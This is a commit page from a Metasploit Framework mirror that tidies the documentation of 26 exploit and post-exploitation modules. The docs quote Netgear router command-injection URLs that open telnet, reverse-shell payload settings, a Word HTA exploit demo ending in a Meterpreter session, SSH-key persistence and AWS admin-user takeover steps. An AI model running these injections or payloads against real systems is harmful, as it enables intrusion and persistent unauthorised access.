infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9493 updates to various docs

4.x
h00die 2018-02-04 13:54:17 -05:00 committed by Jeffrey Martin
parent 64c0d60fbf
commit 5457cec81c
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
26 changed files with 90 additions and 65 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
documentation/modules/auxiliary/admin/smb/ms17_010_command.md
View File

@ -1,4 +1,6 @@
MS17-010 are psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
## Introduction
MS17-010 and psexec are two of the most popular exploits against Microsoft Windows. This module bolts the two together.
You can run any command as SYSTEM. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.

6
documentation/modules/auxiliary/gather/censys_search.md
View File

@ -3,10 +3,10 @@ The module use the Censys REST API to access the same data accessible through we
## Verification Steps
1. Do: `use auxiliary/gather/censys_search`
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
4. Do: `set CENSYS_SEARCHTYPE certificates`
5: Do: `set CENSYS_DORK rapid7`
5: Do: `set CENSYS_DORK query`
6: Do: `run`
## Scenarios

19
documentation/modules/auxiliary/gather/shodan_honeyscore.md
View File

@ -1,8 +1,9 @@
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot or not.
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
## Introduction
The `shodan_honeyscore` module utilizes the [Shodan](https://www.shodan.io/) API to determine whether or not a server is a honeypot.
When setting the module options, we aren't directly requesting `TARGET`, we are requesting the Shodan API to analyze `TARGET` and return a honeyscore from 0.0 to 1.0. 0.0 being `not a honeypot` and 1.0 being a `honeypot`. The original website for the honeypot system can be found here: https://honeyscore.shodan.io/.
#### NOTE:
In order for this module to function properly, a Shodan API key is needed. You can register for a free acount here: https://account.shodan.io/register
#### NOTE:
In order for this module to function properly, a Shodan API key is needed. You can register for a free account here: https://account.shodan.io/register
## Verification Steps
@ -11,18 +12,18 @@ In order for this module to function properly, a Shodan API key is needed. You c
3. Do: `set TARGET <targetip>`
4. Do: `set SHODAN_APIKEY <your apikey>`
5. Do: `run`
6. If the API is up, you should recieve a score from 0.0 to 1.0.
6. If the API is up, you should receive a score from 0.0 to 1.0. (1.0 being a honeypot)
## Options
**TARGET**
The remote host to request the API to scan.
**SHODAN_APIKEY**
This is the API key you recieve when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
This is the API key you receive when signing up for a Shodan account. It should be a 32 character string of random letters and numbers.
## Scenarios

4
documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md
View File

@ -7,8 +7,8 @@
1. start `msfconsole`
2. `use exploit/linux/http/netger_dnslookup_cmd_exec`
3. `set RHOST 192.168.1.1` `<--- Router IP`
4. `set USERNAME xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
5. `set PASSWORD xxxx` (see [here](https://github.com/thecarterb/metasploit-framework/blob/ng_dns_cmd_exec-dev/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
4. `set USERNAME xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
5. `set PASSWORD xxxx` (see [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/netgear_dnslookup_cmd_exec.md#options))
5. `set PAYLOAD cmd/unix/reverse_bash`
6. `set LHOST 192.168.1.x`
7. `set LPORT xxxx`

3
documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md
View File

@ -1,4 +1,5 @@
The netgear_r7000_cgibin_exec module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
## Introduction
The `netgear_r7000_cgibin_exec` module exploits a command injection vulnerability in Netgear R7000 and R6400 router firmware version `1.0.7.2_1.1.93` and possibly earlier. The vulnerability is found in the `/cgi-bin/` folder of the router. A manual injection would look like so: `http://<RouterIP>/cgi-bin/;echo$IFS"cowsay"`. This will echo 'cowsay' on the router. A fairly useful manual command injection is like so: `http://<RouterIP>/cgi-bin/;telnetd$IFS-p$IFS'45'` will open telnet on port 45.
## Vulnerable Application

4
documentation/modules/exploit/multi/fileformat/office_word_macro.md
View File

@ -75,7 +75,9 @@ If you already have Microsoft Office, you can use it to create a docx file and u
## Options
**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit.
**CUSTOMTEMPLATE**
A docx file that will be used as a template to build the exploit.
## Trusted Document

8
documentation/modules/exploit/multi/local/allwinner_backdoor.md
View File

@ -1,10 +1,12 @@
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
## Introduction
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
any for FriendlyARM's NanoPi M1,
SinoVoip's M2+ and M3,
Cuebietech's Cubietruck +
Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.

3
documentation/modules/exploit/multi/script/web_delivery.md
View File

@ -1,3 +1,5 @@
## Introduction
The web_delivery module provides a stealthy way to deliver a payload during post exploitation over HTTP or HTTPS. Because the payload does not touch the disk, it can easily bypass many anti-virus protections.
The web_delivery module supports three different languages for delivery: Python, PHP, and
@ -5,6 +7,7 @@ Powershell. You should manually select the correct target based on the victim en
For example, if you have gained remote access through a PHP application, it is likely you can use PHP. If you are in a modern Windows server environment, then you can usually assume the target supports Powershell as well.
## Verification Steps
To use the web_delivery module, you must first gain access to the target host and be able to execute either a Python, PHP, or Powershell interpreter. Then, follow these steps to proceed with exploitation:

4
documentation/modules/exploit/windows/fileformat/cve_2017_8464_lnk_rce.md
View File

@ -7,8 +7,7 @@ A fix was released in the June 2017 Patch Tuesday.
## Vulnerable Setup
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464. To test the bypass, ensure that MS10-046 & MS15-020 are installed.
To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.
## Verification Steps
### Start a handler
@ -16,7 +15,6 @@ To set up the vulnerable environment, install a Windows version without the patc
2. `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
3. `set LHOST [ip victim connects back to]`
4. `exploit -j`
5. `back`
### Run the exploit

1
documentation/modules/exploit/windows/fileformat/office_dde_delivery.md
View File

@ -1,4 +1,3 @@
Module abuses a feature in MS Field Equations that allow an user to execute an arbitrary application.
## Vulnerable Application

4
documentation/modules/exploit/windows/fileformat/office_ms17_11882.md
View File

@ -1,7 +1,8 @@
## Introduction
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
## Vulnerable Application
## Vulnerable Applications
- Microsoft Office 2016
- Microsoft Office 2013 Service Pack 1
@ -15,6 +16,7 @@ Module exploits a flaw in how the Equation Editor that allows an attacker to exe
3. Do: `set PAYLOAD [PAYLOAD]`
4. Do: `run`
## Options
### FILENAME
Filename to output & if injecting a file, the file to inject

12
documentation/modules/exploit/windows/fileformat/office_word_hta.md
View File

@ -1,11 +1,13 @@
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage.
## Introduction
Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Visual Basic for Application scripting language.
FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
## Vulnerable Application
## Vulnerable Applications
- Windows Vista Service Pack 2
@ -41,8 +43,7 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
## Demo
```
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
@ -52,7 +53,7 @@ srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.146.1:4444
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
@ -65,4 +66,3 @@ and open it with Microsoft Office Word. You should receive a session:
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```

2
documentation/modules/exploit/windows/http/vxsrchs_bof.md
View File

@ -20,7 +20,7 @@
## Scenarios
###VX Search Enterprise v9.5.12 on Windows 7 SP1
### VX Search Enterprise v9.5.12 on Windows 7 SP1
```
msf exploit(vxsrchs_bof) > show options

2
documentation/modules/exploit/windows/local/bypassuac_fodhelper.md
View File

@ -21,7 +21,7 @@
and manually create a job handler corresponding to the payload.
##Scenario
## Scenario
```
msf >

4
documentation/modules/exploit/windows/local/ms16_016_webdav.md
View File

@ -1,10 +1,10 @@
## Intro
This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
This module exploits a null pointer dereference vulnerability present in the `mrxdav.sys` kernel driver on Windows 7 x86. The vulnerability is described by MS16-016 and CVE-2016-0051. The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)
## Usage
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options. From here, running the module will result in the payload being executed with system level privileges.
You'll first need to obtain a session on the target system. Next, once the module is loaded, one simply needs to set the `payload` and `session` options. From here, running the module will result in the payload being executed with system level privileges.
An example session follows:

6
documentation/modules/exploit/windows/local/panda_psevents.md
View File

@ -14,11 +14,11 @@
Example steps in this format:
1. Install the application
2. Wait for `C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads` folder to appear
2. Wait for `C:\ProgramData\Panda Security\Panda Devices Agent\Downloads` folder to appear
3. Start msfconsole
4. Get a shell
5. Do: `use exploit/windows/local/panda_psevents`
6. Do: `set session #`
6. Do: `set session [ID]`
7. Do: `exploit`
8. Go do something else while you wait
9. Enjoy being system with your shell
@ -151,4 +151,4 @@ Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
Faulting package full name:
Faulting package-relative application ID:
```
```

2
documentation/modules/exploit/windows/misc/hp_dataprotector_encrypted_comms.md
View File

@ -11,7 +11,7 @@ context of SYSTEM.
HP Data Protector versions 7, 8, and 9 are known to be affected.
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
This module was tested against version 9.0.0 on Windows 2008.
## Verification Steps

13
documentation/modules/exploit/windows/smb/ms17_010_eternalblue.md
View File

@ -1,8 +1,8 @@
ms17_010_eternalblue is a remote exploit against Microsoft Windows, originally written by the
Equation Group (NSA) and leaked by Shadow Brokers (an unknown hacking entity). It is
considered a reliable exploit and allows you to gain access not only as SYSTEM - the highest Windows
user mode privilege, but also full control of the kernel in ring 0. In modern day penetration tests,
this exploit can be found in internal and external environments.
user mode privilege, but also full control of the kernel in [ring 0](https://en.wikipedia.org/wiki/Protection_ring). In modern day penetration tests,
this exploit can be used in internal and external environments.
As far as remote kernel exploits go, this one is highly reliable and safe to use.
@ -14,13 +14,10 @@ inadvertently added an information disclosure with extra checks on vulnerable co
This exploit works against a vulnerable SMB service from one of these Windows systems:
[//]: # (https://stackoverflow.com/questions/4823468/comments-in-markdown)
[//]: # (* Windows XP x86 (All Service Packs))
[//]: # (* Windows 2003 x86 (All Service Packs))
[//]: # (* Windows 7 x86 (All Service Packs))
* Windows XP x86 (All Service Packs))
* Windows 2003 x86 (All Service Packs))
* Windows 7 x86 (All Service Packs))
* Windows 7 x64 (All Service Packs)
* Windows 2008 R2 x64 (All Service Packs)

5
documentation/modules/post/hardware/automotive/getvinfo.md
View File

@ -1,4 +1,5 @@
Gathers several pieces of information from the vehicle. First it reports
## Introduction
This module gathers several pieces of information from the vehicle. First it reports
the available PIDS for pulling realtime current_data from Mode $01. If some of
the common PIDs are returned it will print those as well, such as Engine Temp and
Vehicle speed. If there are any Diagnostic Trouble Codes (DTCs) it will list those.
@ -22,7 +23,7 @@ PIDs to ASCII.
Determines which CAN bus to communicate on. Type 'supported_buses' for valid options.
**CLEAR_DTCS***
**CLEAR_DTCS**
If any Diagnostic Trouble Codes (DTCs) are present it will clear those and reset the MIL (Engine Light).

8
documentation/modules/post/linux/manage/sshkey_persistence.md
View File

@ -1,3 +1,5 @@
This module will add an SSH key to a specified user (or all), to allow remote login on the victim via SSH at any time.
### Creating A Testing Environment
This module has been tested against:
@ -22,15 +24,15 @@
## Options
**sshd_config**
**SSHD_CONFIG**
Location of the sshd_config file on the remote system. We use this to determine if the authorized_keys file location has changed on the system. If it hasn't, we default to .ssh/authorized_keys
**username**
**USERNAME**
If set, we only write our key to this user. If not, we'll write to all users
**PubKey**
**PUBKEY**
A public key to use. If not provided, a pub/priv key pair is generated automatically

4
documentation/modules/post/multi/escalate/aws_create_iam_user.md
View File

@ -1,6 +1,6 @@
# aws_create_iam_user
# Introduction
aws_create_iam_user is a simple post module that can be used to take over AWS
`aws_create_iam_user` is a simple post module that can be used to take over AWS
accounts. Sure, it is fun enough to take over a single host, but you can own all
hosts in the account if you simply create an admin user.

2
documentation/modules/post/windows/gather/ad_to_sqlite.md
View File

@ -1,3 +1,5 @@
## Introduction
This is a post exploitation module which has the effect of copying the AD groups, user membership
(taking into account nested groups), user information and computers to a local SQLite database.
This is particularly useful for red teaming and simulated attack engagements because it offers

4
documentation/modules/post/windows/gather/hashdump.md
View File

@ -5,7 +5,6 @@ Having this feature as a post module allows it to be used in different penetrati
## Vulnerable Application
---
To be able to use post/gather/hash_dump, you must meet these requirements:
@ -15,13 +14,10 @@ To be able to use post/gather/hash_dump, you must meet these requirements:
## Verification Steps
---
Please see Overview for usage.
## Scenarios
---
**Upgrading to Meterpreter**

2
documentation/modules/post/windows/gather/make_csv_orgchart.md
View File

@ -1,3 +1,5 @@
## Introduction
This module can be used to aid the generation of an organizational chart based on information
contained in Active Directory. The module itself uses ADSI to retrieve key information from AD
(manager, title, description etc) fields and then present it in a CSV file in the form:

25
documentation/modules/post/windows/manage/archmigrate.md
View File

@ -12,13 +12,28 @@ This module was not tested against, but may work against:
1. Other versions of Windows that are x64.
## Verification Steps
## Options
**EXE**
The executable to start and migrate into. Default: `C:\windows\sysnative\svchost.exe`
**FALLBACK**
If the selected migration executable does not exist, fallback to a sysnative file. Default: `true`
**IGNORE_SYSTEM**
Migrate even if you have SYSTEM privileges. Default: `true`
### Verification Steps
1. Start msfconsole
2. Obatin a meterpreter session with an executable meterpreter via whatever method
3. Do: 'use post/windows/manage/archmigrate'
4. Do: 'set session #'
5. Do: 'run'
2. Obtain a meterpreter session with an executable meterpreter via whatever method
3. Do: `use post/windows/manage/archmigrate`
4. Do: `set session #`
5. Do: `run`
## Scenarios

4
documentation/modules/post/windows/manage/run_as_psh.md
View File

@ -25,7 +25,7 @@ The process will use the Start-Process command of powershell to run a process as
## Examples
`
```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword
@ -46,5 +46,5 @@ meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword hidde
[*] Process 9768 created.
meterpreter >
```
`